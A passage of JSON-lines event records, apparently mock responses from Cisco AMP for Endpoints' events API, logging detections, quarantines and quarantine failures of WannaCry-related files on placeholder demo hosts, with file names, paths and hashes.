Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 